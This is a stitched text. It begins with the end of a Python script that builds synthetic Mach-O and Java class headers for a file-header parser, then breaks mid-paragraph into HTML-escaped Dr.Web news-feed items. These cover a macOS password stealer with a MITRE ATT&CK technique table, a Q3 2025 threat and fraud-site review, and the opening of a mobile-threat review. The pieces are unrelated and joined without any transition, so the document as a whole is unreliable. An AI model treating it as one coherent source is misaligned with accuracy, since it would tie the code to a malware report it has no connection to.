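    """Constructed 64-bit mach_header (MH_EXECUTE, no load commands) padded to 4 KiB."""
    fields = (MH_MAGIC_64, cputype, 3, 2, 0, 0, 0, 0)
    return b"".join(v.to_bytes(4, "little") for v in fields) + b"\0" * 4064


def _fat_macho(slices: list) -> bytes:
    """Constructed fat container: header page, then each image on a 4 KiB boundary."""
    entries, blobs, offset = b"", b"", 4096
    for cputype, image in slices:
        padded = image.ljust((len(image) + 4095) // 4096 * 4096, b"\0")
        entries += struct.pack(">iiIII", cputype, 3, offset, len(image), 12)
        blobs += padded
        offset += len(padded)
    header = FAT_MAGIC.to_bytes(4, "big") + len(slices).to_bytes(4, "big") + entries
    return header.ljust(4096, b"\0") + blobs


X86_64, ARM64 = 7 | CPU_ARCH_ABI64, 12 | CPU_ARCH_ABI64
SAMPLE_FAT = _fat_macho([(X86_64, _thin_macho(X86_64)), (ARM64, _thin_macho(ARM64))])
SAMPLE_THIN_X64 = _thin_macho(X86_64)
SAMPLE_JAVA_CLASS = bytes.fromhex("cafebabe00000034") + b"\0" * 64   # minor 0, major 52

if __name__ == "__main__":
    for label, blob in (("fat", SAMPLE_FAT), ("thin", SAMPLE_THIN_X64), ("class", SAMPLE_JAVA_CLASS)):
        print(label, describe(blob))
```

&lt;p&gt;Only the headers are parsed, so the script never executes anything; to go beyond the architecture list (load commands, code signature) the slice at each offset has to be parsed as a thin Mach-O in turn.&lt;/p&gt;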
In addition, some malicious websites distributing the stealer have dedicated sections for downloading the app for other popular operating systems. However, at this time, our virus analysts have not recorded their distribution. For example, the button for downloading the app for the Linux operating system is either inactive or leads to the Windows version of the trojan. And sections for downloading the app onto devices with iOS and Android inform users that these versions are in development. At the same time, it cannot be ruled out that the attackers will begin distributing variants of this trojan for those platforms in the future.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.com/static/new-www/news/2026/may/mac_pws_jobstealer/08_JobStealer.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Malicious sites can potentially distribute versions of the JobStealer trojan designed for Linux, iOS, and Android&lt;/i&gt;&lt;/p&gt;&lt;p&gt;Dr.Web Security Space anti-virus products for macOS and Windows reliably detect and delete all known JobStealer malware modifications, keeping our users well protected from this threat. Fraudulent websites distributing the trojan are added to the database of non-recommended and dangerous resources and are also blocked by Dr.Web.&lt;/p&gt;&lt;h3&gt;MITRE ATT&amp;amp;CK®&lt;/h3&gt;&lt;p&gt;We analyzed&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&amp;nbsp;using the MITRE ATT&amp;amp;CK® framework, a matrix describing the tactics and techniques that cybercriminals utilize to attack information systems. 
The following key techniques were identified:&lt;/p&gt;&lt;div class="table-news-secondary"&gt;&lt;figure class="table"&gt;&lt;table&gt;&lt;thead&gt;&lt;tr&gt;&lt;th&gt;&lt;strong&gt;Stage&lt;/strong&gt;&lt;/th&gt;&lt;th&gt;&lt;strong&gt;Technique&lt;/strong&gt;&lt;/th&gt;&lt;/tr&gt;&lt;/thead&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;Execution&lt;/td&gt;&lt;td&gt;&lt;p&gt;User Execution (T1204)&lt;/p&gt;&lt;p&gt;Malicious Copy and Paste (T1204.004)&lt;/p&gt;&lt;p&gt;Malicious File (T1204.002)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Discovery&lt;/td&gt;&lt;td&gt;File and Directory Discovery (T1083)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Collection&lt;/td&gt;&lt;td&gt;&lt;p&gt;Automated Collection (T1119)&lt;/p&gt;&lt;p&gt;Data from Local System (T1005)&lt;/p&gt;&lt;p&gt;Credentials from Password Stores (T1555)&lt;/p&gt;&lt;p&gt;Keychain (T1555.001)&lt;/p&gt;&lt;p&gt;Credentials from Web Browsers (T1555.003)&lt;/p&gt;&lt;p&gt;Input Capture (T1056)&lt;/p&gt;&lt;p&gt;GUI Input Capture (T1056.002)&lt;/p&gt;&lt;p&gt;Archive Collected Data (T1560)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Command and Control&lt;/td&gt;&lt;td&gt;Web Service (T1102)&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;Exfiltration&lt;/td&gt;&lt;td&gt;&lt;p&gt;Automated Exfiltration (T1020)&lt;/p&gt;&lt;p&gt;Exfiltration Over C2 Channel (T1041)&lt;/p&gt;&lt;p&gt;Exfiltration Over Web Service (T1567)&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/figure&gt;&lt;/div&gt;&lt;p&gt;More details about&amp;nbsp;&lt;a href="https://vms.drweb.com/search/?q=Mac.PWS.JobStealer.1&amp;lng=en"&gt;&lt;b&gt;Mac.PWS.JobStealer.1&lt;/b&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Mac.PWS.JobStealer.1/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15061&amp;lng=en</guid><title>Doctor Web’s Q3 2025 virus activity 
review</title><link>https://news.drweb.com/show/?i=15061&amp;lng=en&amp;c=9</link><pubDate>Wed, 01 Oct 2025 06:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 1, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;
    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;According to statistics collected by the Dr.Web anti-virus, the total number of threats detected in the third quarter of 2025 decreased by 4.23%, compared to the second quarter. The number of unique threats increased by 2.17%. Among the most commonly detected threats were unwanted adware software, ad-displaying trojans, and malicious scripts. Email traffic was dominated by malicious scripts, backdoors, and various trojans, including downloaders, droppers, and password stealers.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
    &lt;p&gt;Users whose files were affected by encoder trojans had mostly encountered &lt;b&gt;Trojan.Encoder.35534&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt;, and &lt;b&gt;Trojan.Encoder.35067&lt;/b&gt;.&lt;/p&gt;
    &lt;p&gt;In July, Doctor Web’s experts &lt;a href="https://news.drweb.com/show/?i=15036&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about the &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; malware family, whose trojans are designed to steal cryptocurrency and passwords. Threat actors distributed these trojans under the guise of mods, cheats, and patches for games. The malware was launched through legitimate apps, including by exploiting DLL search order hijacking vulnerabilities in them.&lt;/p&gt;
    &lt;p&gt;In August, our malware analysts &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;warned&lt;/a&gt; about the spread of &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt;, a multifunctional backdoor for mobile devices that was targeting representatives of Russian business. Cybercriminals controlled this malware remotely and used it to steal confidential data and spy on victims.&lt;/p&gt;
    &lt;p&gt;That same month, Doctor Web's anti-virus laboratory &lt;a href="https://news.drweb.com/show/?i=15046&amp;lng=en" target="_blank"&gt;released a study&lt;/a&gt; of a targeted attack committed against a Russian engineering enterprise by the Scaly Wolf hacker group. The threat actors used a variety of malicious instruments, one of the main ones being the Updatar modular backdoor. With its help, the attackers tried to obtain confidential data from infected computers.&lt;/p&gt;
    &lt;p&gt;In Q3 2025, our Internet analysts detected more fake Telegram messenger websites and a number of fraudulent finance-themed online resources. In addition, over the past three months, our specialists have recorded the emergence of dozens of malicious and unwanted apps on Google Play. Among these were &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans, which subscribe users to paid services, and &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs.&lt;/p&gt;
    &lt;div class="colorful"&gt;
        &lt;h3&gt;Principal trends in Q3 2025&lt;/h3&gt;
        &lt;ul&gt;
            &lt;li&gt;The number of threats detected on protected devices decreased&lt;/li&gt;
            &lt;li&gt;Unique threats attacking users were detected in increased numbers&lt;/li&gt;
            &lt;li&gt;More fake Telegram messenger and fraudulent finance-themed websites emerged&lt;/li&gt;
            &lt;li&gt;Password- and cryptocurrency-stealing &lt;a href="https://vms.drweb.com/search/?q=Trojan.Scavenger&amp;lng=en"&gt;&lt;b&gt;Trojan.Scavenger&lt;/b&gt;&lt;/a&gt; malware was spotted in the wild&lt;/li&gt;
            &lt;li&gt;The backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; was used to spy on Russian business representatives and steal confidential data&lt;/li&gt;
            &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; ad-displaying trojans became the most widespread threat for Android devices&lt;/li&gt;
            &lt;li&gt;The activity of &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; adware trojans decreased for the second quarter in a row&lt;/li&gt;
            &lt;li&gt;Many threats were detected on Google Play&lt;/li&gt;
        &lt;/ul&gt;
    &lt;/div&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;According to Doctor Web’s statistics service&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/01_stat_q3_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/01_stat_q3_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;The most common threats in Q3 2025:&lt;/p&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;VBS.KeySender.7&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious script that, in an infinite loop, searches for windows whose text contains &lt;span class="string"&gt;mode extensions&lt;/span&gt;, &lt;span class="string"&gt;разработчика&lt;/span&gt;, or &lt;span class="string"&gt;розробника&lt;/span&gt; (the Russian and Ukrainian words for “developer”) and sends them an Escape key press event, forcibly closing them.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Downware.20091&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Adware that often serves as an intermediary installer of pirated software.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Trojan.Siggen31.34463&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A trojan written in the Go programming language and designed to download various miner trojans and adware into infected systems. This malware is a DLL file located at &lt;span class="string"&gt;%appdata%\utorrent\lib.dll&lt;/span&gt;. To launch, it exploits a DLL Search Order Hijacking vulnerability in the uTorrent torrent client.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Adware.Ubar.20&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A torrent client designed to install unwanted programs on a user’s device.&lt;/dd&gt;
        &lt;dt&gt;&lt;a href="https://vms.drweb.com/search/?q=JS.Siggen5.44590&amp;lng=en"&gt;&lt;b&gt;JS.Siggen5.44590&lt;/b&gt;&lt;/a&gt;&lt;/dt&gt;
        &lt;dd&gt;Malicious code added to the es5-ext-main public JavaScript library. It shows a specific message if the package is installed on a server with the time zone of a Russian city.&lt;/dd&gt;
    &lt;/dl&gt;
    &lt;h3&gt;Statistics for malware discovered in email traffic&lt;/h3&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/02_mail_traffic_q2_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/02_mail_traffic_q2_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;dl class="dlList"&gt;
        &lt;dt&gt;&lt;b&gt;W97M.DownLoader.2938&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A family of downloader trojans that exploit vulnerabilities in Microsoft Office documents. They can also download other malicious programs to a compromised computer.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2017-11882.123&lt;/b&gt;&lt;/dt&gt;
        &lt;dt&gt;&lt;b&gt;Exploit.CVE-2018-0798.4&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;Exploits designed to take advantage of Microsoft Office software vulnerabilities and allow an attacker to run arbitrary code.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Phishing.745&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious JavaScript script that generates a phishing web page.&lt;/dd&gt;
        &lt;dt&gt;&lt;b&gt;JS.Muldrop.371&lt;/b&gt;&lt;/dt&gt;
        &lt;dd&gt;A malicious JavaScript script that installs a payload into the system.&lt;/dd&gt;
    &lt;/dl&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;Encryption ransomware&lt;/h3&gt;
    &lt;p&gt;In Q3 2025, the number of requests made to decrypt files affected by encoder trojans increased by 3.02%, compared to Q2 2025.&lt;/p&gt;
    &lt;p&gt;The dynamics of the decryption requests received by Doctor Web’s technical support service:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/03_encoder_requests_q3_2025_en.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/03_encoder_requests_q3_2025_en.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;The most common encoders of Q3 2025:&lt;/p&gt;
    &lt;ul&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.35534&lt;/b&gt; — 26.99% of user requests&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.35209&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.35209&lt;/b&gt;&lt;/a&gt; — 3.07% of user requests&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.35067&lt;/b&gt; — 2.76% of user requests&lt;/li&gt;
        &lt;li&gt;&lt;b&gt;Trojan.Encoder.41542&lt;/b&gt; — 2.15% of user requests&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.Encoder.29750&amp;lng=en"&gt;&lt;b&gt;Trojan.Encoder.29750&lt;/b&gt;&lt;/a&gt; — 1.84% of user requests&lt;/li&gt;
    &lt;/ul&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;Network fraud&lt;/h3&gt;
    &lt;p&gt;In Q3 2025, Doctor Web’s Internet analysts continued to detect new fake Telegram messenger websites, including those that fraudsters used to try to gain access to user accounts:&lt;/p&gt;
    &lt;div class="flex fxCenter" style="margin-bottom: 12px;"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_1.png" class="preview"&gt;
                &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_1.1.png" alt="#drweb" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_2.png" class="preview"&gt;
                &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/04_tg_fake_2.1.png" alt="#drweb" style="max-width: 350px;"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p&gt;In addition, finance-themed fraudulent sites continued to emerge. One of them lured users to an “investment platform of the future” called Apple Trade AI, which supposedly had been created by the Apple Corporation. Cybercriminals promised potential victims the opportunity to make more than $4,000 a month. To “access” the platform, they were required to register by providing personal information.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/05_fraud_appletradeai.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/05_fraud_appletradeai.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Other Internet resources offered visitors a chance to join a “new investment platform from Meta” and “create a source of constant income, starting from $4,000 a month”. To access the “platform”, users were asked to take a survey and then register.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/06_fraud_inv_1.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/06_fraud_inv_1.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Our experts also discovered more variants of fake investing platforms that allegedly allowed users to make money with the help of trading bots in &lt;i&gt;WhatsApp&lt;/i&gt;.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/07_fraud_whatsappbusiness.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/07_fraud_whatsappbusiness.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;To “work” with the promised services, potential victims had to provide personal data:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/08_fraud_whatsappbusiness.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/08_fraud_whatsappbusiness.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;A number of fraudulent websites were designed for audiences in specific countries. Some of them were targeting CIS-based users, to whom fraudsters offered the chance to “open a closed investment market” and access some exclusive investments through the INSIDER X financial service. To do so, visitors had to “leave a request” by providing personal data.&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/09_fraud_insiderx.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/09_fraud_insiderx.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;In one of the schemes designed for Russian users, cybercriminals asked users to take a survey in order to gain access to an “investment platform” that was supposedly related to large oil and gas companies and the state-backed Gosuslugi &lt;i&gt;(Госуслуги)&lt;/i&gt; portal:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/10_fraud_gazgosusl.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/10_fraud_gazgosusl.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Scammers passed off some other sites as legitimate Russian bank services and told users they could register in order to “earn at least 50,000 rubles a week”:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/11_fraud_finance.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/11_fraud_finance.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Once again, users from some other countries encountered similar fake websites. On one of them, fraudsters offered users from Kyrgyzstan the opportunity to become part of a people’s program and invest in what they claimed was the country’s largest company:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/12_fraud_gaz.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/12_fraud_gaz.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;Another site was allegedly tied to a Georgian bank and allowed users to join its “investment platform”:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/13_fraud_bankopros.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/13_fraud_bankopros.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;The scammers passed off a similar fake website as belonging to one of Kazakhstan’s banks and promised users an income starting from 600,000 tenge per month:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/14_fraud_bank.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/14_fraud_bank.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;On another site, malicious actors, allegedly on behalf of a Turkish oil and gas company, offered potential victims the opportunity to join an investment platform and make “up to 9,000 Turkish lira a day”:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/15_fraud_bankoffer.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/15_fraud_bankoffer.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;p&gt;At the same time, fraudsters continued exploiting the topic of all kinds of government payments and compensations. On one of the unwanted sites targeting Kazakhstani users, visitors allegedly could check whether financial compensation was available to them and get up to 5,000,000 tenge:&lt;/p&gt;
    &lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 32px;"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/16_fraud_compensation.png" class="preview"&gt;
            &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/review_common_q3/16_fraud_compensation.1.png" alt="#drweb"&gt;
        &lt;/a&gt;
    &lt;/div&gt;
    &lt;a href="http://antifraud.drweb.com/dangerous_urls/" target="_blank"&gt;Find out more about Dr.Web non-recommended sites&lt;/a&gt;
&lt;/section&gt;

&lt;section&gt;
    &lt;h3&gt;Malicious and unwanted programs for mobile devices&lt;/h3&gt;
    &lt;p&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, in Q3 2025, users most often encountered &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; ad-displaying trojans. At the same time, the previously leading &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; trojans dropped to second place, significantly reducing their activity. The third most common threat was &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs.&lt;/p&gt;
    &lt;p&gt;Compared to the second quarter, the number of &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; banking trojan detections increased, while the banking trojans &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; were, to the contrary, detected less often.&lt;/p&gt;
    &lt;p&gt;In August, Doctor Web’s experts &lt;a href="https://news.drweb.com/show/?i=15047&amp;lng=en" target="_blank"&gt;informed&lt;/a&gt; users about the &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; multifunctional backdoor that threat actors had used to spy on representatives of Russian business and steal confidential data from them.&lt;/p&gt;
    &lt;p&gt;Over the course of the last three months, more than 70 malicious and unwanted apps were discovered on Google Play. Among them were &lt;a href="https://vms.drweb.com/search/?q=Android.Joker&amp;lng=en"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; trojans, which subscribe users to paid services, &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; fake programs, and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.16&lt;/b&gt;—a piece of software that allegedly allowed users to convert virtual rewards into real money.&lt;/p&gt;
    &lt;p&gt;The following Q3 2025 events involving mobile malware are the most noteworthy:&lt;/p&gt;
    &lt;ul&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; adware trojans were more active.&lt;/li&gt;
        &lt;li&gt;&lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; ad-displaying trojan activity decreased.&lt;/li&gt;
        &lt;li&gt;Users encountered &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt; banking trojans more often.&lt;/li&gt;
        &lt;li&gt;The number of &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; and &lt;b&gt;Android.SpyMax&lt;/b&gt; banking trojan attacks decreased.&lt;/li&gt;
        &lt;li&gt;Malicious actors used a multifunctional backdoor &lt;a href="https://vms.drweb.com/search/?q=Android.Backdoor.916.origin&amp;lng=en"&gt;&lt;b&gt;Android.Backdoor.916.origin&lt;/b&gt;&lt;/a&gt; to spy on Russian business representatives.&lt;/li&gt;
        &lt;li&gt;Many threats were distributed on Google Play.&lt;/li&gt;
    &lt;/ul&gt;
    &lt;p&gt;To find out more about the security-threat landscape for mobile devices in Q3 2025, read our &lt;a href="https://news.drweb.com/show/?i=15060&amp;lng=en" target="_blank"&gt;special overview&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15060&amp;lng=en</guid><title>Doctor Web’s Q3 2025 review of virus activity on mobile devices</title><link>https://news.drweb.com/show/?i=15060&amp;lng=en&amp;c=9</link><pubDate>Wed, 01 Oct 2025 03:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;October 1, 2025&lt;/b&gt;&lt;/p&gt;

&lt;section&gt;
    &lt;p&gt;&lt;strong&gt;&lt;newslead&gt;According to detection statistics collected by Dr.Web Security Space for mobile devices, &lt;a href="https://vms.drweb.com/search/?q=Android.MobiDash&amp;lng=en"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; ad-displaying trojans were the most widespread threats of Q3 2025. They were detected on protected devices 18.19% more often than during the previous observation period.&lt;/newslead&gt;&lt;/strong&gt;&lt;/p&gt;
    &lt;p&gt;The adware trojans &lt;a href="https://vms.drweb.com/search/?q=Android.HiddenAds&amp;lng=en"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;, whose activity decreased for the second quarter in a row, fell to second place. In the past 3 months, users encountered them 71.85% less often. These malicious apps conceal their icons, making the trojans harder to detect and remove, and then display ads, including full-screen videos.&lt;/p&gt;
    &lt;p&gt;Third place was again occupied by the &lt;a href="https://vms.drweb.com/search/?q=Android.FakeApp&amp;lng=en"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt; trojans that cybercriminals use in various fraudulent schemes; the number of times they were detected decreased by 7.49%. Instead of providing the declared functionality, these malicious apps often load various websites, including fraudulent and malicious ones, as well as bookmaker and online casino websites.&lt;/p&gt;
